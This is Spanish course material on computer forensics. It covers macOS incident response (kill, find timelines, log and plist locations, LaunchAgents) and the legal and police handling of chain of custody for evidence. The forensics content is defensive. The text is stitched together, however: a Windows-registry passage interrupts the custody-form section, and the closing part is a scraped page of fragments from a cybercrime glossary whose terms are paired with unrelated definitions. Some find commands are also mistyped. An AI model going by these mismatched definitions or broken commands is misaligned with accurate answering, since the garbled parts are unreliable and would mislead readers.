PROCESOS EN EJECUCIÓN: KILL

Si nos encontramos en un equipo de respuesta a incidentes o estamos actuando como
tal en nuestra organización, es posible que debamos “matar” algún proceso malicioso
que detectemos.
Quizá un malware que está cifrando la información, quizá una herramienta de minado de
criptomonedas, en ocasiones, vamos a necesitar finalizar procesos que no deberían estar
funcionando y para eso utilizaremos el comando “kill”.
Podemos matar procesos simplemente con “kill [PID]” (ej. “kill 1709” para matar el proceso
con PID = 1709), lo que enviará al proceso una señal para que finalice su ejecución.
Es posible que esto no siempre ocurra (incluso es probable que no nos interese enviar esa
señal a un malware), por lo que podemos especificar qué señal enviar al proceso para su
finalización, siendo la más normal KILL (código 9), la cual fuerza la finalización del proceso
independientemente de su estado (ej. “kill -9 1709” o “kill – KILL 1709”).
Podemos ver el listado de señales que podemos enviar a los procesos con el comando
“kill –l” (tened en cuenta que no se nombran de la misma manera que en Linux).

En Linux el directorio “/proc” contiene todos los detalles del sistema, incluyendo su kernel,
los procesos en ejecución y los parámetros de configuración del sistema.
Sin embargo, en MacOS no existe este directorio y la obtención de la información sobre los
procesos no puede realizarse de la misma manera que cuando analizamos un sistema
Linux.
La alternativa “sencilla” para obtener información relacionada con los procesos en
ejecución en un MacOS sería utilizar el “Monitor de Actividad”.
Desde el “Monitor de actividad” y haciendo doble clic sobre el proceso concreto a analizar,
podemos obtener información y estadísticas.
Incluido el proceso padre (quién lo ha lanzado), el usuario asociado y los archivos y
puertos abiertos.
Además, tenemos la opción de “Muestrear” el proceso, lo que creará un detallado informe
sobre el mismo en el que se incluye información relevante para poder realizar un análisis
sobre su comportamiento.
No vamos a obtener lo mismo que con un volcado, pero al menos sí vamos a poder
estudiar su comportamiento.

ÚLTIMOS ARCHIVOS MODIFICADOS
Analizando las fechas de modificación, acceso y creación de los archivos, podemos
intentar reproducir las acciones realizadas por los atacantes en un sistema.
Para ello podemos utilizar el comando “find”. Este comando nos permite especificar qué
queremos buscar exactamente (archivos, carpetas, etc.) así como la información que
queremos obtener.
Gracias al comando “find” podemos crear una línea temporal de las acciones que se han
ido realizando sobre un sistema. Eso sí, debemos tener en cuenta que todas las fechas
son susceptibles de ser alteradas, por lo que tenemos que prestar especial atención a
cualquier incoherencia que podamos encontrar.
Para obtener el listado de los últimos archivos modificados tan solo debemos ejecutar el
comando:
• find. –type f –user root –perm +111 -newermt ‘YYYY-MM-DD HH:MM’

• . Directorio actual
• -type f Archivo
• -user root Usuario propietario
• -perm +111 Permisos (ejecutable por cualquiera)
• -newermt Última modificación desde…
ÚLTIMOS ARCHIVOS CREADOS

Por supuesto, también podemos utilizar el comando “find” para obtener la lista de los
archivos creados recientemente.
Para ello ejecutaremos el mismo comando que para listar los archivos modificados, pero
indicando que la fecha que queremos obtener es la de creación:
• find. –type f –user root –perm +111 -newerBt ‘YYYY-MM-DD HH:MM’

• newerBT Creados a partir de…
LOS ARCHIVOS DE LOG

De manera similar a cuando estudiamos los archivos de log de Linux (y en realidad los
de cualquier SO), estos archivos almacenan información sobre las actividades realizadas
en el sistema. Los podríamos asimilar a los archivos de eventos que vimos para sistemas
Windows.
La mayoría de los archivos de log de MacOS se almacenan en las rutas:
• /var/log/ Logs del Sistema

• /Library/Logs/ Logs de las aplicaciones del Sistema
• /Users/[USUARIO]/Library/Logs Logs de las aplicaciones de usuario

Aunque hay distintos archivos de log, en esta sesión nos vamos a centrar en aquellos que
tienen mayor interés desde un punto de vista forense.
Cuando trabajamos con archivos de log, es recomendable tener una idea de qué es
lo que buscamos ya que, aunque es posible una revisión en profundidad de todos los
archivos, la cantidad de tiempo y recursos que invertiríamos harían inviable la pericial.
Es por ello por lo que en los análisis forenses es recomendable centrarse en:
• /var/log/system.log
• /var/log/install.log
• Otros archivos de log específicos de aquellas aplicaciones que fueran de
interés para la pericial (ej. Mysql, apache, etc.)
LOS ARCHIVOS PLIST

Los archivos Plist (Property list) almacenan información en forma de clave–valor en
formato binario (BPlist) o XML (Plist).
El uso más común de estos archivos es almacenar las preferencias del usuario, pero
también podemos encontrar información relevante como tokens de inicio de sesión,
contraseñas o metadatos (ejemplo, información sobre las partes de una grabación de
audio).
También podemos encontrar información sobre el sistema operativo. Por ejemplo, el

archivo «/System/Library/CoreServices/SystemVersion.plist», nos proporciona información
sobre la versión concreta del Sistema Operativo instalado en el equipo.
Los archivos Plist tienen como extensión «.plist», por lo que es muy sencillo localizarlos
mediante una búsqueda en caliente (con el equipo encendido) o en frío (con el equipo
apagado).
Para visualizar estos archivos, podemos utilizar cualquier editor de texto plano (en el caso
de Plist en formato XML) o herramientas específicas como: Plist Explorer, PlistEdit Pro o Plist
Pad, entre otras.
Una ruta muy interesante para analizar archivos Plist es la carpeta de preferencias de los
usuarios ubicada en la ruta: $HOME/Library/Preferences/.
En esta carpeta encontraremos la mayoría de los archivos Plist de configuración de

los programas que el usuario ha ejecutado en el equipo. También podemos encontrar
múltiples archivos Plist en la carpeta de preferencias global, ubicada en la ruta: /Library/
Preferences/.

Ilustración 74. Extracto del archivo «org.videolan.vlc.plist».
LAUNCHAGENTS Y DAEMONS EN MACOS

Hay dos tipos de archivos en MacOS que gestionan los procesos del sistema: los
LaunchAgents y los daemons (demonios).
Los LaunchAgents dependen de un usuario, por lo que es necesario iniciar sesión para que
se ejecuten. Estos procesos se ejecutan en segundo plano, y son capaces de interactuar
con el interfaz del sistema.
Por su parte, los daemons no tienen interfaz y no dependen de un usuario, sino que se
inician con el propio sistema.
Su definición, tanto de los LaunchAgents como de los daemons se realiza a través de
archivos Plist.
Los archivos Plist que almacenan los parámetros de ejecución de los LaunchAgents y los
Daemons los podemos encontrar en tres ubicaciones distintas del sistema:
• «/System/Library/» Elementos del sistema

• LaunchAgents/ y LaunchDaemons
• «/Library/» Elementos comunes a todos los usuarios
• LaunchAgents/ y LaunchDaemons.
• «$HOME/Library/» Elementos propios de cada usuario
• LaunchAgents.
Por seguridad, la carpeta «/System/Library/» está protegida, y solo el propio sistema

tiene acceso a ella, por lo que no deberíamos encontrar en ella (en principio) elementos
externos.
Si durante un análisis forense encontramos algo extraño en esta carpeta, debemos
prestar especial atención, ya que probablemente se trate de un malware o algún otro
programa no legítimo.

6. Gestión efectiva de la
cadena de custodia
6.1. Concepto
La cadena de custodia consiste en el procedimiento que se ha de aplicar para asegurar,

embalar y proteger cada una de las evidencias encontradas y evitar con ello su
suplantación o contaminación.
La cadena de custodia comienza una vez identificado y embalado el material probatorio
y evidencia física, y concluye con el destino final decidido tras la resolución de la
investigación.
De forma específica debe efectuarse una doble cadena de custodia en esta disciplina,
una física del propio objeto y otra digital de los datos que contiene. La cadena custodia
digital se gestionará mediante la obtención de HASH del archivo o del soporte completo
objeto de estudio.
A continuación, puede observarse un ejemplo de formulario de custodia:
Sistemas Operativos Windows con el fin de almacenar información necesaria

para configurar el sistema para los usuarios, las aplicaciones y los dispositivos
de hardware. El registro reemplaza a la mayoría de los archivos de configuración
basados en texto que se utilizaban en los antiguos Windows 3.x y MS-DOS, como
Autoexec.bat y Config.sys, y contiene información que Windows utiliza de manera
recurrente, como, por ejemplo: Los perfiles de los usuarios. Las aplicaciones
instaladas en el equipo. Los tipos de documentos que cada aplicación puede
crear. Los elementos de hardware que hay en el sistema. Los puertos que se están
utilizando. El registro se estructura en forma de árbol, y contiene dos elementos
básicos: claves y valores. Las claves del registro son similares a carpetas: además
de los valores, cada clave puede contener subclaves que, a su vez, pueden
contener más subclaves; y, así, sucesivamente. Las claves están referenciadas
con una sintaxis parecida a los nombres de las rutas de Windows, y usan barras
diagonales inversas para indicar los distintos niveles jerárquicos. Cada subclave
tiene obligatoriamente un nombre: una cadena que no puede contener barras
diagonales inversas y en la que no se distingue entre mayúsculas y minúsculas.

Ilustración 75. Ejemplo de formulario de custodia.
Puede observarse cómo la matriz permitirá obtener una traza de todos los movimientos
realizados con la evidencia, reflejando en todo momento la persona que realiza la entrega,
y la persona responsable a partir del momento de recibir la evidencia y quedar a cargo
de la misma. Es importante también asegurar que el estado de esta y el HASH no varía a
lo largo de toda la cadena de custodia.
La cadena de custodia es el nombre que recibe el conjunto de actos que tienen por
objeto la recogida, el traslado y la custodia de las evidencias obtenidas en el curso
de una investigación criminal y que tienen la finalidad de garantizar la autenticidad,
inalterabilidad e indemnidad de la prueba.

Lo que se pretende con la cadena de custodia es garantizar la validez de la prueba,
ya que si no se sigue el protocolo marcado la prueba podría ser declarada inválida a
efectos de fundar la sentencia.
En consecuencia, con el fin de poder sustentar en las pruebas el hecho probado, y mostrar
la culpabilidad de su presunto autor, es preciso aportarlas al proceso penal y para ello
primero hay que encontrarlas. Es aquí, con la práctica de la diligencia de inspección
ocular técnico-policial sobre el lugar y objetos relacionados con el hecho delictivo, donde
comienza la labor fundamental de la Policía Científica, cumpliendo con su misión de
investigar los delitos y perseguir a los delincuentes.
Así, tras la comisión de un hecho delictivo debe acudirse a la escena del delito, con el fin
de buscar y recoger todos aquellos indicios, vestigios, huellas o trazas que se encuentren.
Se trata de tareas que exigen una especialización técnica de la que gozan los funcionarios
de la Policía Científica, expertos en inspecciones oculares. Posteriormente, estas muestras
deben ser enviadas a los laboratorios para que sean analizados por los especialistas en
criminalística, que aplicarán sobre ellas los conocimientos y los métodos de investigación
científicos, convirtiendo así el indicio en evidencia. Las conclusiones que se derivan de
este trabajo se trasladarán al juicio oral mediante el informe pericial correspondiente,
pudiendo alcanzar entonces el valor de pruebas de cargo.
Para ello, es imprescindible garantizar la corrección de la denominada “cadena de
custodia”, sin que pueda apreciarse pérdida de eslabón alguno, con el fin de asegurar
que aquello que se presenta ante los tribunales como evidencia o prueba es lo mismo
que se encontró en la escena del delito.
Sin embargo, para saber qué es o qué se entiende por cadena de custodia, no podemos
acudir a ninguna norma, pues no hay una regulación expresa de la misma. Se trata, como
bien se ha dicho, “de un concepto surgido de la propia realidad, a la que se ha teñido
de valor jurídico”. Y si hablamos de cadena de custodia policial, es precisamente porque
son ellos, la policía científica, los custodios de aquellos rastros que ha dejado el autor
del delito, los encargados de preservar esos vestigios o indicios que previamente han
recogido y posteriormente han analizado bajo el prisma de las ciencias forenses, hasta
llevarlos al proceso penal convertidos en pruebas de cargo.
Para ello, y como se expondrá más adelante, con el fin de asegurar que lo que se
presenta ante los tribunales es lo mismo que lo hallado en el lugar del crimen, han ido
elaborando unos protocolos de actuación internos. Esto servirá para documentar cada
una de las fases que recorre todo elemento probatorio, dejando constancia de cada uno
de sus pasos, con el objetivo último de fortalecer lo que de ellos dictamine el experto en
su informe pericial. A este proceder, es al que finalmente se ha dado valor jurídico y se
conoce como: cadena de custodia.
En este sentido, podemos señalar como características de la cadena de custodia las
siguientes:
La cadena de custodia constituye un sistema formal de garantía que tiene por finalidad
dejar constancia de todas las actividades llevadas a cabo por todas y cada una de
las personas que se ponen en contacto con las evidencias. De ese modo, la cadena de
custodia sirve como garantía de la autenticidad e indemnidad de la prueba. La infracción
de la cadena de custodia afecta a lo que se denomina la “verosimilitud de la prueba
pericial” y, en consecuencia, a su legitimidad y validez para servir de prueba de cargo en
el proceso penal.

La cadena de custodia constituye una garantía de que la evidencias que se analizan
y los resultados obrantes en el dictamen pericial son las mismas que se recogieron
durante la investigación criminal, de modo que no existan dudas sobre el objeto de la
prueba pericial. A este respecto, resulta evidente la relación entre la cadena de custodia
y la prueba pericial, por cuanto la validez de los resultados de la pericia depende de la
garantía sobre la procedencia y contenido de lo que es objeto de análisis. Es por ello
por lo que en una situación ideal sería el propio perito que realizará el análisis el que
procediese a la recogida de las muestras y evidencias, ya que el análisis pericial puede
quedar determinado, en gran medida, por el modo cómo se obtiene y se conserva la
muestra a analizar.
Lo importante, en definitiva, es que en todo informe pericial se contenga la información
precisa de los actos de recogida, aprehensión y la cadena de custodia seguida con
relación las evidencias o muestras objeto de análisis. En caso contrario se podrá poner
en duda el resultado con base en la falta de verosimilitud de la prueba.
La cadena de custodia se refiere y está asociada a la prueba como actividad y también
como resultado. Efectivamente, la cadena de custodia determina la validez de la
prueba e, indirectamente, de su resultado por cuanto la infracción de sus normas puede
determinar que se «aparte» o «expulse» del procedimiento penal la evidencia y/o el
resultado que se contuviere en el informe pericial. No puede haber un juicio justo sin una
actividad probatoria válida y de cargo capaz de enervar la presunción de inocencia.
Siendo así, la relación directa de la evidencia con los hechos objeto de enjuiciamiento y
su verosimilitud respecto de la prueba pericial son requisitos para su validez. A ese fin, es
necesario que se garantice que las evidencias que sirven de prueba estén relacionadas
con los hechos y que no hayan podido ser alteradas o modificadas desde su recogida
hasta su aportación como prueba al juicio oral. En consecuencia, la cadena de custodia
garantiza la verosimilitud de la prueba y por tanto se constituye en requisito necesario del
proceso penal, sin el cual no puede hablarse de un juicio justo y con todas las garantías.
La cadena de custodia puede acreditarse documentalmente o mediante testimonio.
Efectivamente, nada impide que la cadena de custodia se acredite mediante el testimonio
de las personas que recogieron, custodiaron y/o conservaron las evidencias. Debe tenerse
en cuenta, en este sentido, que el atestado policial donde se suelen contener los actos de
la cadena de custodia tiene la consideración de denuncia por lo que suele ser necesario
traer al plenario a los policías que actuaron en los actos de la cadena de custodia.
De modo que, para la plena convalidación de los actos de cadena de custodia, será
necesaria la declaración en el juicio oral de los agentes que la efectuaron, siempre que
alguna de las partes alegue infracción y solicite su presencia. En caso de que la cadena
de custodia esté debidamente documentada y no exista ninguna clase de impugnación,
la jurisprudencia viene considerando que no se producirá ninguna clase de irregularidad
pudiendo valorarse la prueba conforme resulta del informe pericial. En cualquier caso, la
naturaleza de garantía formal de la cadena de custodia, como en definitiva de muchos
actos del proceso penal, debería determinar que el testimonio de los funcionarios que
actuaron en el asunto no pudiera suplir la carencia absoluta de documentación que
acredite los actos de custodia sobre las evidencias obtenidas en la investigación criminal.
Cabe señalar que no afectan a la cadena de custodia los problemas que se puedan
plantear con relación a evidencias que puedan haber quedado en la escena o lugar del
delito tras una primera inspección de la policía. Este es un supuesto que puede darse y
que no se relaciona directamente con la cadena de custodia, sino con la acreditación de
la autoría mediante la prueba de la relación entre los hechos delictivos y los acusados.

Finalmente, también debe distinguirse la cadena de custodia de determinadas actividades
de investigación o documentación que puedan practicarse sobre los efectos intervenidos
y que suelen incluirse junto con los actos de la cadena de custodia.
En resumen, tenemos que la cadena de custodia implica, necesariamente, los siguientes
pasos:
1. Búsqueda del medio de prueba.
2. Identificación del medio de prueba.
3. Protección y preservación del medio de prueba.
4. Individualización del medio de prueba.
5. Transporte apropiado.
6. Entrega controlada.
En consecuencia, la cadena de custodia de los medios de prueba encuentra su

fundamento en los siguientes principios probatorios:
• Principio de aseguramiento de la prueba.

• Principio de la licitud de la prueba.
• Principio de la veracidad de la prueba.
• Principio de la necesidad de la prueba.
• Principio de la obtención coactiva de la prueba.
• Principio de la inmediación, publicidad y contradicción de la
prueba.
6.2. Protocolos internos de Policía Científica.

Cuando analizamos la evolución de las normas internas y protocolos de actuación en el
área de policía científica, nos tenemos que remontar al año 1995, año en el que se crea
el primer manual de normas de procedimientos para todas las áreas de policía científica
que, en aquella época, se trabajaban.
A partir de entonces, se han ido realizando periódicas modificaciones, para cubrir nuevas
actuaciones y mejorar en los procedimientos de trabajo.
La creación del Manual y sus actualizaciones tenía y tiene un doble objetivo:
Por un lado, un objetivo general, tendente a unificar los criterios de actuación y
funcionamiento de todas las unidades operativas de policía científica, siguiendo unos
requisitos de buenas prácticas de funcionamiento dentro de un sistema de calidad y
conforme a unos estándares procedimentales que se desarrollaban de la mano de la
administración de justicia.
Por otro lado, se perseguía un objetivo específico, operativo, que pretendía dotar de
una herramienta a los especialistas de policía científica que, en su día a día, tenían que
enfrentarse a la recogida de indicios, su traslado, su análisis y emisión de resultados, todo
ello siguiendo una actuación conforme a un adecuado sistema de cadena de custodia.
Aquí es importante manejar dos ideas:

¿Quién establece las normas de procedimiento?
¿Quién dice que esas reglas que se han establecido son las adecuadas para conseguir
el fin establecido?
Evidentemente, debe existir una autoridad competente que será la que, después de
realizar los análisis oportunos, determine cuales son las normas de procedimiento a
seguir y a quién le afecta y está obligado a cumplir las mismas.
En cuanto a quién valida y dice que estas normas de procedimiento son las adecuadas
para conseguir el fin establecido, entramos en todo lo que hace referencia a un sistema
de calidad y acreditación.
Así, en los últimos años este sistema de calidad ha desembocado en la acreditación
de las actuaciones de los laboratorios de biología-ADN, y análisis químicos de drogas
estudio y tratamiento de huellas latentes, etc. Proceso éste, de acreditación, que se irá
extendiendo en un futuro inmediato a la práctica totalidad de las áreas de actuación de
policía científica.
Dentro de esta actuación en la escena del delito, las normas de procedimiento establecidas
van de la mano de la cadena de custodia.
Por lo tanto, todos estos pasos internos y externos deben quedar reflejados de forma
documental, de tal manera que exista una «trazabilidad» de todo el proceso que sigue
un indicio o muestra. Inicialmente, y de forma detallada, deben constar en el Acta de
Inspección Ocular o en el acto de comparecencia y posteriormente mediante los
oportunos oficios de remisión o impresos de entrega y recogida, de tal manera que exista
una «cadena» que permita identificar todos estos movimientos de entrega y recogida
del indicio y su almacenaje durante todo el proceso de análisis y estudios que se realizan
sobre él, hasta que concluyen los mismos, protegiéndolos contra la contaminación,
adulteración, sustracción, intercambio o destrucción. Es necesario dejar constancia
finalmente dónde y en qué condiciones queda el indicio o muestra.
Pieza importante de todo este proceso es la realización de la Inspección Ocular
Técnico Policial, actuación básica que, como no podía ser menos, está perfectamente
protocolizada, conforme a unas normas de procedimiento generales, que comprende
esencialmente las siguientes fases de actuación:
• Protección y preservación del lugar de los hechos.

• Recopilación de información preliminar.
• Observación, valoración y planificación.
• Búsqueda y tratamiento de las evidencias.
• Liberación del lugar de los hechos.
• Fase documental y remisión de evidencias.
Cuando se realiza una Inspección Ocular Técnico Policial, hay que ser consciente de
que es el inicio de todo el proceso de cadena de custodia anteriormente indicado y
sobre el que se va a sustentar todo el resto del proceso. De nada sirve que se tengan

los mejores equipos e instrumentos de análisis si luego una evidencia, como puede ser
una bala o una muestra de sangre, recogida en la escena del crimen, ha sido obtenida
de forma inadecuada, no siguiendo las normas de procedimiento establecidas y sin las
garantías de reproductibilidad mínimas necesarias. Esta actuación, de por sí metódica y
protocolizada, tiene como fin su demostración y recreación en la fase judicial del plenario,
de su vista ante la autoridad judicial, un tribunal o un jurado. Y esa reproductibilidad se
realiza fundamentalmente de tres formas:
DE FORMA DOCUMENTAL
Consistente en la realización de un Acta de Inspección Ocular Técnico Policial, con sus
formatos y requisitos de procedimiento, tales como:
• Especificará día, fecha, hora y lugar de realización del Acta.

• Lugar donde se realiza la I.O.T.P.
• Datos relativos a denunciante y víctimas.
• Funcionarios actuantes.
• Fecha y hora en que se solicita la realización de la I.O.T.P.
• Hora de llegada al lugar de los hechos.
• Testigos presentes.
• Otros funcionarios policiales o personal asistencial presentes y
unidades a las que pertenecen.
• Hojas de cotejo tomadas y muestras indubitadas tomadas.
• Descripción del lugar y de las víctimas (si existieren) y
comprobaciones que se realizan.
• Objetos o indicios encontrados y muestras recogidas, con
descripción minuciosa de las mismas, ubicación, método de
recogida, forma de almacenamiento y traslado.
• Relación detallada de dichos objetos y muestras recogidas.
• Especificación de los estudios iniciales que se realizarán sobre los
mismos.
• Documentos adjuntos: fotografías, grabaciones en video, planos
croquis, etc.
• Fecha y hora en que se finaliza la I.O.T.P.
• Situación en que queda el lugar de los hechos tras su finalización
(liberación de la escena).
• Fecha y hora en que se finaliza la confección de Acta.
• Datos relativos a las diligencias policiales o procedimiento judicial
que se instruye con motivo de los hechos que se investigan.
• Número de folios que componen el Acta.
DE FORMA GRÁFICA
Consistente en aportar las imágenes necesarias para ver todo aquello que en el Acta
de Inspección Técnico Policial se está describiendo, tales como reportajes fotográficos,
grabaciones videográficas, grabaciones de audio, planos y croquis y reconstrucción o
visualización de la escena del crimen mediante la utilización de grabaciones realizadas
en tres dimensiones (3D), mediante la utilización de escáneres láseres.

DE FORMA TESTIFICAL
Finalmente, la actuación de ese equipo de especialistas, que ha procesado una escena
del crimen, recogido todos aquellos indicios y muestras que han podido servir para
esclarecer el hecho criminal y han realizado los análisis necesarios, deben ratificar en el
juicio, en calidad de testigo cualificado y técnico, que la jurisprudencia denomina testigo-
perito. Por lo tanto, comprobamos que el Acta de IOTP se erige en el pilar sobre el que
descansa todo el proceso de la cadena de custodia, a partir del cual, y nuevamente
siguiendo las normas de procedimiento internas de policía científica, se establecen los
mecanismos adecuados para el aseguramiento de todas las pruebas. Todo ello con el fin
de garantizar que lo recogido en origen en la escena del crimen o de donde se ha extraído
una muestra, es aquello que se ha analizado en un laboratorio, por ejemplo, de biología
o de balística, y ha permitido identificar al autor o autores del hecho. Estas normas de
procedimiento internas abarcan todo este proceso, pasando por la confección de los
propios informes técnicos policiales o periciales correspondientes y finalizando con la
indicación de en qué situación queda esa evidencia o muestra recogida.
6.3. ¿Qué elementos se incluyen en el documento de

cadena de custodia?
Volvamos al ejemplo ya visto:
Ilustración 76. Documento de cadena de custodia

Es importante resaltar que, cono en las actuaciones que llevan a cabo los policías, también
es necesario que se siga una cadena de custodia efectiva en las pruebas realizadas de
parte, en los laboratorios privados.
Cuando la muestra llega al laboratorio, los técnicos han de iniciar este documento e indicar
qué pruebas se realizar y por a quién. La consecuencia de no seguir este procedimiento
es la misma que en el ámbito policial, se puede invalidar la prueba a nivel judicial.
6.4. Cadena de custodia de la evidencia digital.

De manera general la evidencia digital, también conocida como prueba electrónica, en su
acepción general dentro del ámbito probatorio, puede ser considerada como cualquier
información almacenada o transmitida en forma digital, que una de las partes podrá
utilizar en el juicio.
La evidencia digital es una denominación usada de manera amplia para describir
cualquier registro generado o almacenado en un sistema computacional que puede ser
utilizado como prueba en un proceso legal.
Eoghan Casey define la evidencia de digital como “cualquier dato que puede establecer
que un crimen se ha ejecutado (commit) o puede proporcionar un enlace (link) entre un
crimen y su víctima o un crimen y su autor (CASEY, Eoghan. “Digital Evidence and Com-
puter Crime: Forensic Science, Computers, and the Internet”. 2004).
Jeimy J.Cano,Ph.D,CFE, en su artículo “Introducción a la Informática Forense” puntualiza,
que la evidencia digital, es un término utilizado de manera amplia para describir
“cualquier registro generado por o almacenado en un sistema computacional que puede
ser utilizado como evidencia en un proceso legal.”
La evidencia digital puede dividirse en tres categorías:
• Registros almacenados en el equipo de tecnología

informática (por ejemplo, correos electrónicos,
archivos de aplicaciones de ofimática, imágenes, etc.).
• Registros generados por los equipos de tecnología
informática (registros de auditoría, registros de
transacciones, registros de eventos, etc.)
• Registros que parcialmente han sido generados
y almacenados en los equipos de tecnología
informática. (Hojas de cálculo financieras, consultas
especializadas en bases de datos vistas parciales de
datos, etc.)
La evidencia digital tiene como objetivo principal: recolectar evidencia digital presente
en toda clase de infracciones en los delitos Informáticos.
Los objetivos específicos son:

• Compensar de los daños causados por los criminales o
intrusos.
• Perseguir y procesar judicialmente a los criminales
informáticos.
• Aplicar medidas como un enfoque preventivo.
Ilustración 77. Evidencia Digital. Fuente: Alonso Caballero / ReYDeS
6.5. Clasificación de la evidencia digital

Cano clasifica la evidencia digital que contiene texto en 3 categorías (Cano Martines
Jeimy José, Mosquera González José Alejandro, Certain Jaramillo Andrés Felipe. Evidencia
Digital: contexto, situación e implicaciones nacionales. Abril de 2005):
• Registros generados por computador. Estos registros son aquellos, que

como dice su nombre, son generados como efecto de la programación de un
computador. Los registros generados por computador son inalterables por una
persona. Estos registros son llamados registros de eventos de seguridad (logs)
y sirven como prueba tras demostrar el correcto y adecuado funcionamiento
del sistema o computador que generó el registro.
• Registros no generados sino simplemente almacenados por o en
computadores. Estos registros son aquellos generados por una persona, y que
son almacenados en el computador, por ejemplo, un documento realizado con
un procesador de palabras. En estos registros es importante lograr demostrar
la identidad del generador, y probar hechos o afirmaciones contenidas en la
evidencia misma. Para lo anterior se debe demostrar sucesos que muestren
que las afirmaciones humanas contenidas en la evidencia son reales.
• Registros híbridos que incluyen tanto registros generados por computador
como almacenados en los mismos. Los registros híbridos son aquellos que
combinan afirmaciones humanas y logs. Para que estos registros sirvan como
prueba deben cumplir los dos requisitos anteriores.
• Harley Kozushko (2003), menciona que la evidencia digital se puede clasificar,
comparar, e individualizar, es decir es el proceso por el cual se buscan
características generales de archivos y datos, características que diferencian
evidencias similares y que deben ser utilizadas a criterio del investigador, por
ejemplo:

• Contenido: Un e-mail, por ejemplo, puede ser clasificado por su contenido
como SPAM, y puede ser individualizado a partir del contenido de sus
encabezados, información que, por lo general, no es visible para el usuario. Por
ejemplo, por su dirección de origen.
• Función: El investigador puede examinar cómo funciona un programa para
clasificarlo y algunas veces individualizarlo. Por ejemplo, un programa que
inesperadamente transfiere información valiosa desde un computador
confiable a una locación remota podría ser clasificado como un caballo de
Troya y puede ser individualizado por la localización remota a la que transfiere
la información.
• Características: los nombres de archivo, extensiones e inclusive los encabezados
internos que identifican los diferentes formatos de archivo que existen pueden
ser de utilidad en la clasificación de la evidencia digital.
• La idea fundamental es que si se hace una clasificación adecuada basándose
en la experiencia y en las técnicas adecuadas se podrá hacer hablar a
las “evidencias”. Se debe recordar la frase del Edmond Locard (1910): “Las
evidencias son testigos mudos que no mienten”.
6.6. Usos de la evidencia digital

• Persecución Criminal: Evidencia incriminatoria puede ser usada para procesar
una variedad de crímenes, incluyendo homicidios, fraude financiero, tráfico y
venta de drogas, evasión de impuestos o pornografía infantil.
• Litigación Civil: Casos que tratan con fraude, discriminación, acoso, divorcio,
pueden ser ayudados por la informática forense. Investigación de Seguros: La
evidencia encontrada en computadores, puede ayudar a las compañías de
seguros a disminuir los costos de los reclamos por accidentes y compensaciones.
• Temas corporativos: Puede ser recolectada información en casos que tratan
sobre acoso sexual, robo, mal uso o apropiación de información confidencial o
propietaria, o aún de espionaje industrial.
• Mantenimiento de la ley: La informática forense puede ser usada en la
búsqueda inicial de órdenes judiciales, así como en la búsqueda de información
una vez que se tiene la orden judicial para hacer la búsqueda exhaustiva.
• Investigación científica: Academias y universidades aprovechan las bondades
de la informática forense para realizar estudios de seguridad, vigilar la evolución
de las amenazas e identificar las tendencias de los ataques informáticos, entre
otros.
• Usuario final: Cada vez es más común que las personas usen herramientas de
software para recuperar archivos borrados, encriptar documentos y rastrear el
origen de un correo electrónico…
6.7. Manipulación de la evidencia digital

Es importante tener presente los siguientes requisitos que se deben cumplir en cuanto a
la manipulación de la evidencia digital:
Hacer uso de medios forenses estériles (para copias de información)
Mantener y controlar la integridad del medio original. Esto significa que, a la hora de
recolectar la evidencia digital, las acciones realizadas no deben cambiar nunca esta
evidencia.

Cuando sea necesario que una persona tenga acceso a evidencia digital forense, esa
persona debe ser un profesional forense.
Las copias de los datos obtenidas deben estar correctamente marcadas, controladas
y preservadas. Y al igual que los resultados de la investigación, deben estar disponibles
para su revisión.
Siempre que la evidencia digital este en poder de algún individuo, éste será responsable
de todas las acciones tomadas con respecto a ella, mientras esté en su poder.
Las agencias responsables de llevar el proceso de recolección y análisis de la evidencia
digital serán quienes deben garantizar el cumplimiento de los principios anteriores.

13.10.23 - Base Principal Del Manual

Cargado por

Información del documento

Título original

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

13.10.23 - Base Principal Del Manual

Cargado por

Copyright:

Formatos disponibles

INTRODUCCIÓN

La Oficina de las Naciones Unidas Contra la Droga y el Delito -UNODC-, gracias

La ciberdelincuencia se diferencia de los delitos comunes en que «no tiene

Este esfuerzo responde y orienta con procesos en el análisis de dispositivos

El presente documento fue elaborado con participación del equipo de trabajo de

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 1

ACOSO INFANTIL: En matemáticas e informática, se trata

Extracción de la información a Equipos ANÁLISIS DE EVIDENCIA DIGITAL:

ADQUISICIÓN: Archivo borrado que ha sido parcial o

2 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 3

CERTIFICADO DE CUALIFICACIÓN CIBERBULLYING O CIBERACOSO:

4 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 5

DECODIFICACIÓN: DERECHO DE AUTOR:

Es el proceso en el cual el receptor Incluye obras literarias tales como

6 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 7

8 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

FORENSE: Es un acto que permite el acceso de

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 9

10 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 11

12 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 13

PRINCIPIO DE INTEGRIDAD: Es la obtenida a partir de un dispositivo

14 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 15

16 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS
